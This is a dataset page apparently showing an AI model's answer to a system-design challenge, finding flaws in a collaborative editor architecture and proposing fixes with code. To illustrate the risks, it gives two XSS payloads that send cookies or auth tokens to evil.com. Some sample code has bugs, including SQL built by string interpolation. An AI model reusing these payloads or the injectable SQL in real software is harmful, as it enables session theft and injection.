4 models have responded to the "Debug This Architecture" challenge. Compare their approaches side-by-side on RIVAL. This response is part of RIVAL's open dataset of 5,600+ AI model responses.
Claude Opus 4.6's response to the 'Debug This Architecture' challenge.
Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
This architecture has several critical flaws that would cause data loss, inconsistency, and poor user experience at scale. I'll work through every layer systematically.
The Flaw: Each API server only broadcasts changes to its own WebSocket clients. Other servers discover changes by polling PostgreSQL every 2 seconds.
Timeline showing the problem:
Server A (Alice connected) Server B (Bob connected)
───────────────────────────────── ─────────────────────────────────
t=0.0s Alice types "Hello"
t=0.0s Broadcast to Server A
clients ✓
t=0.0s Write to PostgreSQL
t=0.1s Bob types "World"
t=0.1s Broadcast to Server B
clients ✓
t=0.1s Write to PostgreSQL
... silence ... ... silence ...
t=2.0s t=2.0s Poll PostgreSQL
Poll PostgreSQL → discovers "Hello"
→ discovers "World" → broadcasts to Bob
→ broadcasts to Alice
Result: 2-SECOND LATENCY for cross-server collaboration.
That's completely unacceptable for real-time editing.
The Solution: Dedicated pub/sub layer for inter-server communication.
┌──────────┐ WebSocket ┌────────────┐
│ Alice │◄──────────────────►│ Server A │
└──────────┘ └─────┬──────┘
│ PUBLISH "doc:123"
▼
┌────────────┐
│ Redis │
│ Pub/Sub │
└─────┬──────┘
│ SUBSCRIBE "doc:123"
▼
┌──────────┐ WebSocket ┌────────────┐
│ Bob │◄──────────────────►│ Server B │
└──────────┘ └────────────┘
// Server-side: publish changes to all servers via Redis Pub/Sub
const Redis = require('ioredis');
const pub = new Redis(REDIS_URL);
const sub = new Redis(REDIS_URL);
// When a change arrives via WebSocket from a client
async function handleClientChange(change, documentId, serverId) {
// 1. Persist to database
await persistChange(change);
// 2. Broadcast to local WebSocket clients (immediate, <10ms)
broadcastToLocalClients(documentId, change);
// 3. Publish to Redis so OTHER servers get it immediately
await pub.publish(`doc:${documentId}`, JSON.stringify({
change,
originServer: serverId, // so we can avoid echo
timestamp: Date.now()
}));
}
// Every server subscribes to channels for documents with active editors
sub.on('message', (channel, message) => {
const { change, originServer } = JSON.parse(message);
// Don't re-broadcast changes that originated from this server
if (originServer === MY_SERVER_ID) return;
const documentId = channel.replace('doc:', '');
broadcastToLocalClients(documentId, change);
});
// Subscribe when a client opens a document
function onClientOpensDocument(documentId) {
sub.subscribe(`doc:${documentId}`);
}
Trade-offs:
The Flaw: This is the most damaging design choice in the entire architecture. With last-write-wins at the paragraph level, concurrent edits cause silent data loss.
Scenario: Alice and Bob both edit the same paragraph simultaneously.
Original paragraph: "The quick brown fox"
Alice (t=100): "The quick brown fox jumps over the lazy dog"
(added " jumps over the lazy dog")
Bob (t=101): "The slow brown fox"
(changed "quick" to "slow")
Last-write-wins result: "The slow brown fox"
Alice's addition is SILENTLY DELETED. No warning. No merge. Just gone.
The Solution: Operational Transformation (OT) or CRDTs.
For a Google Docs-style editor, OT is the proven approach. Here's the conceptual implementation:
// Each change is expressed as an operation, not a state snapshot
// Operations are: retain(n), insert(text), delete(n)
// Alice's operation on "The quick brown fox" (length 19):
const aliceOp = [
retain(19), // keep everything
insert(" jumps over the lazy dog") // append
];
// Bob's operation on "The quick brown fox" (length 19):
const bobOp = [
retain(4), // keep "The "
delete(5), // remove "quick"
insert("slow"), // insert "slow"
retain(10) // keep " brown fox"
];
// The OT transform function computes compatible operations
const [alicePrime, bobPrime] = transform(aliceOp, bobOp);
// Applying both transformed operations yields:
// "The slow brown fox jumps over the lazy dog"
// BOTH edits are preserved!
// Server-side OT engine
class DocumentOTEngine {
constructor(documentId) {
this.documentId = documentId;
this.revision = 0; // monotonically increasing server revision
this.operationLog = []; // ordered list of all operations
}
/**
* Client sends: { revision: clientRev, operation: op }
* clientRev = the server revision the client's op was based on
*/
async receiveOperation(clientRevision, operation, userId) {
// Transform against all operations that happened since
// the client's known revision
let transformedOp = operation;
for (let i = clientRevision; i < this.revision; i++) {
const serverOp = this.operationLog[i];
// Transform client op against each concurrent server op
[transformedOp] = transform(transformedOp, serverOp);
}
// Apply the transformed operation to the server document
this.document = apply(this.document, transformedOp);
this.operationLog.push(transformedOp);
this.revision++;
// Persist and broadcast
await this.persist(transformedOp);
this.broadcast(transformedOp, userId);
// Send acknowledgment to the original client
return { revision: this.revision };
}
}
Trade-offs:
ot.js or ShareDB)The Flaw: Conflict resolution relies on client-side timestamps. Client clocks are arbitrary.
Alice's laptop clock: 2024-01-15 14:00:00 (correct)
Bob's laptop clock: 2024-01-15 09:00:00 (5 hours behind)
Bob's edits will ALWAYS lose to Alice's, even if Bob edited later.
Worse: a malicious user could set their clock to year 2030
and their edits would always win.
The Solution: Use server-assigned logical ordering.
// Every operation gets a server-side revision number
// This is the OT approach from 1.2, but even without OT:
class DocumentRevisionManager {
// Use a PostgreSQL sequence or Redis INCR for atomic ordering
async assignRevision(documentId, operation) {
// INCR is atomic in Redis — no two operations get the same number
const revision = await redis.incr(`doc:${documentId}:revision`);
return {
...operation,
revision, // server-assigned order
serverTimestamp: Date.now(), // server clock, not client
// client timestamp kept only for analytics, never for ordering
clientTimestamp: operation.clientTimestamp
};
}
}
Trade-offs:
The Flaw: Documents are saved as full HTML snapshots every 30 seconds. If a server crashes, up to 30 seconds of all active users' work is lost.
t=0s Snapshot saved
t=5s Alice types a paragraph
t=15s Bob adds a table
t=25s Carol writes three paragraphs
t=29s SERVER CRASHES
─────────────────
All work from t=0s to t=29s is GONE.
Three users just lost their work simultaneously.
The Solution: Event-sourced operation log with periodic snapshots for fast loading.
// Every individual operation is persisted immediately
// Snapshots are just an optimization for fast document loading
// PostgreSQL schema
const schema = `
-- The operation log is the source of truth
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL, -- the OT operation
user_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision) -- enforces operation ordering
);
-- Snapshots are a materialized optimization, not the source of truth
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
revision INTEGER NOT NULL, -- snapshot is valid AT this revision
content JSONB NOT NULL, -- full document state
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY(document_id, revision)
);
-- Index for fast "give me ops since revision X" queries
CREATE INDEX idx_ops_doc_revision
ON document_operations(document_id, revision);
`;
// Loading a document: snapshot + replay
async function loadDocument(documentId) {
// 1. Get the latest snapshot
const snapshot = await db.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
// 2. Get all operations AFTER the snapshot
const ops = await db.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, snapshot.revision]);
// 3. Replay operations on top of snapshot
let document = snapshot.content;
for (const op of ops) {
document = applyOperation(document, op.operation);
}
return { document, revision: snapshot.revision + ops.length };
}
// Background job: create snapshots periodically to bound replay cost
async function createSnapshot(documentId) {
const { document, revision } = await loadDocument(documentId);
await db.query(`
INSERT INTO document_snapshots (document_id, revision, content)
VALUES ($1, $2, $3)
ON CONFLICT DO NOTHING
`, [documentId, revision, document]);
}
Trade-offs:
The Flaw: Storing documents as "full HTML snapshots" creates multiple problems:
Problems with raw HTML storage:
1. XSS VULNERABILITY:
User pastes: <img src=x onerror="fetch('evil.com/steal?cookie='+document.cookie)">
If stored as raw HTML and rendered, every viewer gets compromised.
2. BLOAT:
A 1-page document in HTML: ~50KB
Same content in structured JSON: ~5KB
With 30-second snapshots × millions of documents = massive storage
3. NO STRUCTURED OPERATIONS:
You can't diff two HTML snapshots to figure out what changed.
You can't do OT on raw HTML.
You can't build features like "show me what Bob changed."
The Solution: Use a structured document model (like ProseMirror/Tiptap's JSON schema).
// Instead of: "<h1>Title</h1><p>Hello <strong>world</strong></p>"
// Store:
const documentStructure = {
type: "doc",
content: [
{
type: "heading",
attrs: { level: 1 },
content: [{ type: "text", text: "Title" }]
},
{
type: "paragraph",
content: [
{ type: "text", text: "Hello " },
{ type: "text", text: "world", marks: [{ type: "bold" }] }
]
}
]
};
// This structured format:
// ✓ Can be validated against a schema (no XSS)
// ✓ Can be diffed structurally
// ✓ Can have OT operations applied to it
// ✓ Is ~60-80% smaller than equivalent HTML
// ✓ Can be rendered to HTML, Markdown, PDF, etc.
// Sanitization on output (defense in depth)
function renderToHTML(doc) {
// Even with structured storage, sanitize on render
return sanitizeHtml(structuredToHtml(doc), {
allowedTags: ['h1','h2','h3','p','strong','em','a','ul','ol','li','table'],
allowedAttributes: { 'a': ['href'] }
});
}
The Flaw: Every keystroke from every user results in a write to PostgreSQL. PostgreSQL is excellent, but it's not designed for the write pattern of "millions of tiny inserts per second with immediate consistency requirements."
Back-of-napkin math:
- 100,000 concurrent users
- Average 3 operations/second per user (typing)
- = 300,000 writes/second to PostgreSQL
- Each write needs to be durable (fsync) for data safety
- PostgreSQL on good hardware: ~50,000-100,000 TPS
You're 3-6x over capacity.
The Solution: Multi-tier write strategy.
// Tier 1: Redis Streams for immediate durability + ordering (microseconds)
// Tier 2: Async drain from Redis to PostgreSQL (batched, milliseconds)
const Redis = require('ioredis');
const redis = new Redis(REDIS_URL);
// When an operation arrives, write to Redis Stream (very fast, persistent)
async function persistOperation(documentId, operation) {
// XADD is O(1) and Redis Streams are persistent (AOF)
const streamId = await redis.xadd(
`ops:${documentId}`,
'*', // auto-generate ID
'op', JSON.stringify(operation)
);
// Also publish for real-time broadcast (from section 1.1)
await redis.publish(`doc:${documentId}`, JSON.stringify(operation));
return streamId;
}
// Background worker: drain Redis Streams to PostgreSQL in batches
async function drainToPostgres() {
while (true) {
// Read up to 100 operations from each active document stream
const streams = await redis.xreadgroup(
'GROUP', 'pg-writer', 'worker-1',
'COUNT', 100,
'BLOCK', 1000, // wait up to 1s for new data
'STREAMS', ...activeDocumentStreams, ...ids
);
if (streams) {
// Batch insert into PostgreSQL (much more efficient)
const values = streams.flatMap(([stream, entries]) =>
entries.map(([id, fields]) => {
const op = JSON.parse(fields[1]);
return `('${op.documentId}', ${op.revision}, '${JSON.stringify(op)}'::jsonb)`;
})
);
await db.query(`
INSERT INTO document_operations (document_id, revision, operation)
VALUES ${values.join(',')}
`);
// Acknowledge processed entries
for (const [stream, entries] of streams) {
await redis.xack(stream, 'pg-writer', ...entries.map(e => e[0]));
}
}
}
}
Trade-offs:
The Flaw: OT requires serialized processing of operations per document. If 500 users are editing the same document, all operations must be processed sequentially by one entity. With round-robin load balancing, operations for the same document scatter across all servers.
Round-robin distributes users randomly:
Server 1: Alice (doc A), Dave (doc B), Grace (doc A)
Server 2: Bob (doc A), Eve (doc C), Heidi (doc A)
Server 3: Carol (doc A), Frank (doc B), Ivan (doc A)
Document A's operations arrive at 3 different servers.
Who serializes them? Who runs the OT engine?
Every server would need to coordinate via distributed locking. Nightmare.
The Solution: Sticky routing — all connections for a document go to the same server.
# Nginx/HAProxy: route by document ID, not round-robin
upstream api_servers {
# Consistent hashing by document ID
hash $arg_documentId consistent;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# WebSocket upgrade with document-based routing
map $args $document_id {
~documentId=(?<did>[^&]+) $did;
}
server {
location /ws {
proxy_pass http://api_servers;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Sticky routing: same document always goes to same server
# Consistent hashing means adding/removing servers only
# remaps ~1/N of documents
}
}
// Server-side: each server is the authoritative OT engine
// for its assigned documents
class Server {
constructor() {
// In-memory OT engines only for documents assigned to THIS server
this.documentEngines = new Map();
}
getOrCreateEngine(documentId) {
if (!this.documentEngines.has(documentId)) {
const engine = new DocumentOTEngine(documentId);
// Load current state from database
engine.initialize();
this.documentEngines.set(documentId, engine);
}
return this.documentEngines.get(documentId);
}
async handleOperation(documentId, clientRevision, operation) {
const engine = this.getOrCreateEngine(documentId);
// Serialized per-document via the single engine instance
// Node.js single-threaded event loop helps here!
return engine.receiveOperation(clientRevision, operation);
}
}
Trade-offs:
The Flaw: PostgreSQL read replicas have replication lag (typically 10ms-1s, but can spike to minutes under load). If a user writes to the primary and then reads from a replica, they may not see their own changes.
t=0ms User saves document title → write goes to PRIMARY
t=5ms User's browser requests document list → read goes to REPLICA
Replica hasn't received the write yet
User doesn't see their new title → "Where did my change go?!"
The Solution: Read-your-own-writes consistency.
// Track the last write position per user session
class ConsistentReader {
// After any write, store the PostgreSQL WAL position
async afterWrite(userId) {
const result = await primaryDb.query(
'SELECT pg_current_wal_lsn() as lsn'
);
await redis.set(
`user:${userId}:last_write_lsn`,
result.rows[0].lsn,
'EX', 30 // expire after 30 seconds
);
}
// Before any read, check if the replica has caught up
async getReadConnection(userId) {
const lastWriteLsn = await redis.get(`user:${userId}:last_write_lsn`);
if (!lastWriteLsn) {
// No recent writes — replica is fine
return replicaDb;
}
// Check if replica has caught up to the user's last write
const result = await replicaDb.query(
'SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn as caught_up',
[lastWriteLsn]
);
if (result.rows[0].caught_up) {
return replicaDb;
}
// Replica hasn't caught up — read from primary
return primaryDb;
}
}
Trade-offs:
The Flaw: Partitioning by organization ID means one large organization's data all lives on one partition. If Google (500,000 employees) uses your tool, that partition is 1000x larger than a 50-person startup's partition.
Partition 1: ["TinyStartup LLC"] → 200 documents
Partition 2: ["MegaCorp Inc."] → 5,000,000 documents
Partition 3: ["SmallAgency Co."] → 500 documents
Partition 2 is a massive hot spot.
The Solution: Hash-based partitioning on document ID, with organization as a secondary index.
-- Partition by hash of document_id (even distribution guaranteed)
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
org_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (document_id);
-- Create partitions (e.g., 16 partitions)
CREATE TABLE document_operations_p0
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 0);
CREATE TABLE document_operations_p1
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 1);
-- ... through p15
-- Organization-level queries use an index, not the partition key
CREATE INDEX idx_ops_org ON document_operations (org_id, created_at);
Trade-offs:
The Flaw: JWTs stored in localStorage are accessible to any JavaScript running on the page. A single XSS vulnerability (including from third-party scripts) exposes every user's session.
// Any XSS payload can steal the token:
fetch('https://evil.com/steal', {
method: 'POST',
body: JSON.stringify({
token: localStorage.getItem('auth_token'),
// Attacker now has a 24-hour valid session
// They can read/modify ALL of the user's documents
})
});
The Solution: HttpOnly cookies with proper security attributes.
// Server: set JWT as HttpOnly cookie (JavaScript cannot access it)
function setAuthCookie(res, token) {
res.cookie('session', token, {
httpOnly: true, // JavaScript cannot read this cookie
secure: true, // only sent over HTTPS
sameSite: 'strict', // not sent on cross-origin requests (CSRF protection)
maxAge: 24 * 60 * 60 * 1000, // 24 hours
path: '/',
domain: '.yourdomain.com'
});
}
// For WebSocket auth (cookies are sent on WS handshake):
const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });
server.on('upgrade', (request, socket, head) => {
// Parse cookie from the upgrade request headers
const cookies = parseCookies(request.headers.cookie);
const token = cookies.session;
try {
const user = jwt.verify(token, JWT_SECRET);
wss.handleUpgrade(request, socket, head, (ws) => {
ws.user = user;
wss.emit('connection', ws, request);
});
} catch (err) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
});
Trade-offs:
The Flaw: If a user's token is compromised, or they're fired/deactivated, the token remains valid for up to 24 hours. JWTs are stateless — there's no server-side way to invalidate them without additional infrastructure.
t=0h Employee gets JWT (expires t=24h)
t=1h Employee is terminated, account deactivated
t=1h-24h Terminated employee still has full access
Can download/modify/delete all documents they had access to
The Solution: Short-lived access tokens + refresh token rotation + server-side deny list.
// Token strategy:
// - Access token: 15-minute expiry (short-lived, used for API calls)
// - Refresh token: 7-day expiry (stored in HttpOnly cookie, used to get new access tokens)
function issueTokens(user) {
const accessToken = jwt.sign(
{ userId: user.id, role: user.role },
ACCESS_SECRET,
{ expiresIn: '15m' }
);
const refreshToken = jwt.sign(
{ userId: user.id, tokenFamily: uuid() },
REFRESH_SECRET,
{ expiresIn: '7d' }
);
// Store refresh token hash in database for revocation
await db.query(`
INSERT INTO refresh_tokens (user_id, token_hash, family, expires_at)
VALUES ($1, $2, $3, NOW() + INTERVAL '7 days')
`, [user.id, hash(refreshToken), refreshToken.tokenFamily]);
return { accessToken, refreshToken };
}
// Fast revocation check using Redis (checked on every request)
async function isTokenRevoked(jti) {
return await redis.sismember('revoked_tokens', jti);
}
// When user is deactivated: revoke all their tokens
async function deactivateUser(userId) {
// Add all active token IDs to the deny list
await redis.sadd('revoked_tokens', ...activeTokenIds);
// Delete all refresh tokens
await db.query('DELETE FROM refresh_tokens WHERE user_id = $1', [userId]);
}
Trade-offs:
The Flaw: The architecture describes authentication (JWT) but not authorization. Once authenticated, can any user open a WebSocket to any document? Every incoming operation must be checked.
// VULNERABLE: no authorization check
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Anyone can send operations to any document!
await handleOperation(documentId, operation);
});
The Solution: Per-document permission checks on every operation.
// Permission model
const PERMISSIONS = {
OWNER: ['read', 'write', 'share', 'delete'],
EDITOR: ['read', 'write'],
COMMENTER: ['read', 'comment'],
VIEWER: ['read']
};
// Check on WebSocket connection AND on every message
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Check permission (cached in Redis for performance)
const permission = await getPermission(ws.user.id, documentId);
if (!permission || !PERMISSIONS[permission].includes('write')) {
ws.send(JSON.stringify({
error: 'FORBIDDEN',
message: 'You do not have write access to this document'
}));
return;
}
await handleOperation(documentId, operation, ws.user);
});
// Cache permissions in Redis (invalidate on share/unshare)
async function getPermission(userId, documentId) {
const cacheKey = `perm:${userId}:${documentId}`;
let permission = await redis.get(cacheKey);
if (!permission) {
const result = await db.query(`
SELECT role FROM document_permissions
WHERE user_id = $1 AND document_id = $2
`, [userId, documentId]);
permission = result.rows[0]?.role || 'NONE';
await redis.set(cacheKey, permission, 'EX', 300); // cache 5 min
}
return permission === 'NONE' ? null : permission;
}
The Flaw: CloudFront caching API responses for 5 minutes is extremely dangerous for a collaborative editor. Users will see stale document lists, stale permissions, and stale content.
Scenario:
t=0:00 Alice shares document with Bob → API returns "shared" status
CloudFront caches this response
t=0:30 Alice REVOKES Bob's access → API returns "not shared"
But CloudFront still has the old cached response
t=0:30-5:00 Bob's browser still gets the cached "shared" response
Bob can still see and potentially access the document
for up to 5 more minutes after access was revoked
The Solution: Separate caching strategies by content type.
// CDN configuration: NEVER cache authenticated API responses
// Only cache static assets and truly public content
// CloudFront behavior configurations:
const cloudFrontBehaviors = {
// Static assets: aggressive caching
'/static/*': {
cachePolicyId: 'CachingOptimized', // cache forever, bust with filename hash
ttl: { default: 86400, max: 31536000 },
compress: true
},
// Public marketing pages: moderate caching
'/public/*': {
cachePolicyId: 'CachingOptimized',
ttl: { default: 300 }, // 5 min is fine for public content
},
// API endpoints: NO CDN CACHING
'/api/*': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer', // forward all headers
// Let the application server set its own Cache-Control headers
},
// WebSocket: pass through entirely
'/ws': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer',
}
};
// Application-level caching headers (set by the API server)
app.get('/api/documents', (req, res) => {
res.set({
'Cache-Control': 'private, no-store', // never cache user-specific data
'Vary': 'Authorization, Cookie'
});
// ... return documents
});
app.get('/api/documents/:id/content', (req, res) => {
// Document content changes constantly in a collaborative editor
res.set('Cache-Control', 'no-store');
// ... return content
});
Trade-offs:
The Flaw: The architecture doesn't address what happens when a WebSocket connection drops (network switch, laptop sleep, mobile network change). Without explicit handling, users will type into a disconnected editor and lose everything.
The Solution: Client-side operation buffering with automatic reconnection.
class ResilientDocumentConnection {
constructor(documentId) {
this.documentId = documentId;
this.pendingOps = []; // operations not yet acknowledged by server
this.bufferedOps = []; // operations created while disconnected
this.serverRevision = 0;
this.state = 'disconnected'; // disconnected | connecting | synchronized
this.reconnectAttempt = 0;
}
connect() {
this.state = 'connecting';
this.ws = new WebSocket(
`wss://api.example.com/ws?documentId=${this.documentId}`
);
this.ws.onopen = () => {
this.state = 'synchronized';
this.reconnectAttempt = 0;
// Send any operations that were buffered while offline
for (const op of this.bufferedOps) {
this.sendOperation(op);
}
this.bufferedOps = [];
};
this.ws.onclose = (event) => {
this.state = 'disconnected';
this.scheduleReconnect();
};
this.ws.onerror = () => {
// onclose will fire after onerror
};
this.ws.onmessage = (event) => {
this.handleServerMessage(JSON.parse(event.data));
};
}
// User makes an edit
applyLocalOperation(operation) {
// Always apply locally immediately (optimistic)
this.editor.apply(operation);
if (this.state === 'synchronized') {
this.sendOperation(operation);
} else {
// Buffer for later — user can keep typing offline
this.bufferedOps.push(operation);
this.showOfflineIndicator();
}
}
scheduleReconnect() {
// Exponential backoff with jitter
const baseDelay = Math.min(1000 * Math.pow(2, this.reconnectAttempt), 30000);
const jitter = baseDelay * 0.5 * Math.random();
const delay = baseDelay + jitter;
this.reconnectAttempt++;
console.log(`Reconnecting in ${Math.round(delay)}ms (attempt ${this.reconnectAttempt})`);
setTimeout(() => this.connect(), delay);
}
showOfflineIndicator() {
// Show yellow "offline — changes will sync when reconnected" banner
// Users MUST know their changes aren't saved yet
document.getElementById('sync-status').className = 'offline';
}
}
Trade-offs:
The Flaw: Long-lived WebSocket connections accumulate state. Without proper cleanup, servers leak memory from abandoned connections, dead subscriptions, and orphaned OT engine instances.
// Common leak patterns:
// LEAK 1: Client closes browser without clean disconnect
// The TCP connection may stay "open" on the server for minutes
// LEAK 2: OT engines for documents that no one is editing anymore
// stay in memory indefinitely
// LEAK 3: Redis pub/sub subscriptions for documents never unsubscribed
The Solution: Heartbeat monitoring + resource lifecycle management.
class ConnectionManager {
constructor() {
this.connections = new Map(); // ws → metadata
this.documentSubscribers = new Map(); // documentId → Set<ws>
}
addConnection(ws, user, documentId) {
ws.isAlive = true;
ws.documentId = documentId;
this.connections.set(ws, {
user,
documentId,
connectedAt: Date.now(),
lastActivity: Date.now()
});
// Track subscribers per document
if (!this.documentSubscribers.has(documentId)) {
this.documentSubscribers.set(documentId, new Set());
redis.subscribe(`doc:${documentId}`); // subscribe on first user
}
this.documentSubscribers.get(documentId).add(ws);
// Heartbeat: client must respond to pings
ws.on('pong', () => { ws.isAlive = true; });
ws.on('close', () => this.removeConnection(ws));
ws.on('error', () => this.removeConnection(ws));
}
removeConnection(ws) {
const meta = this.connections.get(ws);
if (!meta) return;
this.connections.delete(ws);
// Remove from document subscribers
const subs = this.documentSubscribers.get(meta.documentId);
if (subs) {
subs.delete(ws);
// If no more subscribers for this document, clean up
if (subs.size === 0) {
this.documentSubscribers.delete(meta.documentId);
redis.unsubscribe(`doc:${meta.documentId}`);
// Unload OT engine after a grace period
// (in case someone reconnects quickly)
setTimeout(() => {
if (!this.documentSubscribers.has(meta.documentId)) {
documentEngines.delete(meta.documentId);
console.log(`Unloaded OT engine for doc ${meta.documentId}`);
}
}, 60000); // 60-second grace period
}
}
try { ws.terminate(); } catch (e) {}
}
// Run every 30 seconds: detect dead connections
startHeartbeat() {
setInterval(() => {
for (const [ws, meta] of this.connections) {
if (!ws.isAlive) {
console.log(`Dead connection detected: user ${meta.user.id}`);
this.removeConnection(ws);
return;
}
ws.isAlive = false;
ws.ping(); // client must respond with pong within 30s
}
}, 30000);
}
}
The Flaw: Round-robin assigns connections evenly at connection time, but WebSocket connections are long-lived. Over time, as servers are added/removed or connections have different lifetimes, load becomes severely unbalanced.
Scenario: Start with 2 servers, each gets 5000 connections.
Add server 3 for scaling.
Server 1: 5000 connections (existing, long-lived)
Server 2: 5000 connections (existing, long-lived)
Server 3: 0 connections (new, gets only NEW connections)
Round-robin sends new connections equally, but existing connections
don't rebalance. Server 3 is idle while 1 and 2 are overloaded.
The Solution: Least-connections routing + connection count awareness.
upstream api_servers {
# Use least_conn instead of round-robin for WebSocket connections
# This sends new connections to the server with fewest active connections
least_conn;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# BUT: combine with consistent hashing for document routing (from 3.1)
# Use a two-tier approach:
# Tier 1: Document-to-server assignment (consistent hash)
# Tier 2: Within the assigned server, least-connections for load awareness
// Active rebalancing: when a new server joins, gradually migrate documents
async function rebalanceDocuments(newServerList) {
const currentAssignments = await getDocumentAssignments();
const newAssignments = consistentHash(currentAssignments, newServerList);
for (const [docId, { oldServer, newServer }] of changedAssignments) {
if (oldServer !== newServer) {
// Gracefully migrate: tell clients to reconnect to new server
await notifyClientsToReconnect(docId, newServer);
// Stagger migrations to avoid thundering herd
await sleep(100);
}
}
}
┌────┬──────────────────────────────────────┬──────────┬────────────┐
│ # │ Issue │ Severity │ Effort │
├────┼──────────────────────────────────────┼──────────┼────────────┤
│ 1 │ Last-write-wins destroys data (1.2) │ CRITICAL │ High │
│ 2 │ JWT in localStorage / XSS (4.1) │ CRITICAL │ Medium │
│ 3 │ No document authorization (4.3) │ CRITICAL │ Medium │
│ 4 │ 30s snapshot data loss (2.1) │ HIGH │ Medium │
│ 5 │ CDN caching API responses (5.1) │ HIGH │ Low │
│ 6 │ 2-second cross-server delay (1.1) │ HIGH │ Low │
│ 7 │ Client clock timestamps (1.3) │ HIGH │ Low │
│ 8 │ No reconnection handling (6.1) │ HIGH │ Medium │
│ 9 │ JWT no revocation (4.2) │ MEDIUM │ Medium │
│ 10 │ Split-brain document routing (3.1) │ MEDIUM │ Medium │
│ 11 │ HTML snapshot bloat/XSS (2.2) │ MEDIUM │ Medium │
│ 12 │ Org-based hot spots (3.3) │ MEDIUM │ Low │
│ 13 │ Read replica staleness (3.2) │ MEDIUM │ Medium │
│ 14 │ PG write bottleneck (2.3) │ LOW* │ High │
│ 15 │ WebSocket memory leaks (6.2) │ LOW* │ Medium │
│ 16 │ Round-robin imbalance (7.1) │ LOW* │ Low │
└────┴──────────────────────────────────────┴──────────┴────────────┘
* LOW at current scale, becomes HIGH at scale
The core issue is that this architecture treats a real-time collaborative editor like a traditional CRUD application. The fundamental shift needed is from state-based synchronization (snapshots, last-write-wins) to operation-based synchronization (OT/CRDTs, operation logs, event sourcing). That single conceptual change resolves issues 1, 2, 3, 4, and 7 simultaneously.
Turn this model response into notes, narration, or a short video
Partner link